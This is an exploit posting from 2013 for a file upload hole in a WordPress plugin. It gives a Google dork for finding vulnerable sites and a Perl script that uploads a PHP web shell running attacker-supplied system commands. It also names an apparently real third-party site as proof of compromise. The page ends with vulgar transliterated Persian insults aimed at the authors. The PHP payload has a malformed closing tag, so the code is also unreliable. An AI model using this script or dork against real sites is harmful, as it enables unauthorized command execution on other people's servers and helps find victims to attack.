facebook facebook twitter rss

Wordpress koskosi plugin File Upload Vulnerability

Author: IrIsT Security & Researcher Team , Published: 20-03-2013
############################################################################
# Title : Wordpress koskosi plugin File Upload Vulnerability #
# Author : IrIsT.Ir #
# Discovered By : Am!r #
# #
# Home : http://www.IrIsT.Ir/forum #
# Google Dork => inurl:/wp-content/plugins/kos-uploader/ #
# Security Risk : High #
# Version : All Version #
# Tested on : win7,BT,Ubuntu #
############################################################################

perl exploit :

use LWP::UserAgent;
use Data::Dumper;
print "Enter Your Target : (http://site.com)";
chomp($irist=<STDIN>);
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;
my $res = $ua->request(POST $irist . "/wp-content/plugins/kos-uploader/kososher.php", [ 'kososher=<?php system($_GET["irist"]); >', 'capcha1=123456', 'kiri=123456', submit => '%C2%A0Append%C2%A0']); #problem
print "your kososher shell uploaded . path =" . $irist . "/wp-content/plugins/kos-uploader/files/tmpkir.php";


Shell Access : http://localhost/wordpress/wp-content/plugins/kos-uploader/kososher.php


[#] Proof :

[#] www.tbh.ir/wp-content/plugins/kos-uploader/kososher.php.php
[#] & More In Google

[#] Greeting ####################################################################################################################################################
# Greats : Amir - C0dex - Beni_Vanda - Dj.TiniVini - Mr.epsilon - sajjad13and11
# and All Members In Www.IrIsT.Ir/forum
#
#################################################################################################################################################################
[#] eyval irist , eyval am!r o ahmaghaye dor o baresh...
az kososher plugin bug gereftin :))
kiram to harchi site sabte exploite kos o shere ke to toshon sabt mikoni. khob olagh to 1 site motabar sabt kon , hichkodom az xpl haton kar nemikonan.
khak bar sareton...
#################################################################################################################################################################

Like us on Facebook :